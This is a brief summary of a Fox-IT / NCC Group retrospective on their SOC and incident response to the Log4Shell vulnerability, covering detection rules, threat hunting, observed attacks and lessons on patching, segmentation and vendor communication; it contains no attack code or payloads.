One Year Since Log4Shell: Lessons Learned for the next ‘code red’

This Fox-IT / NCC Group retrospective describes their SOC and CIRT response to the Log4Shell (CVE-2021-44228) 'code red', detailing the first-72-hour timeline, rapid development and deployment of detection (including Suricata rules and IOC harvesting), emergency threat-hunting procedures, publication of IOCs and tools, and a year-long incident response review that observed ransomware, coinminers, and APT-related espionage; the report emphasizes quick wins, real-time detection, network segmentation, timely patching, and clearer vendor communication as core lessons.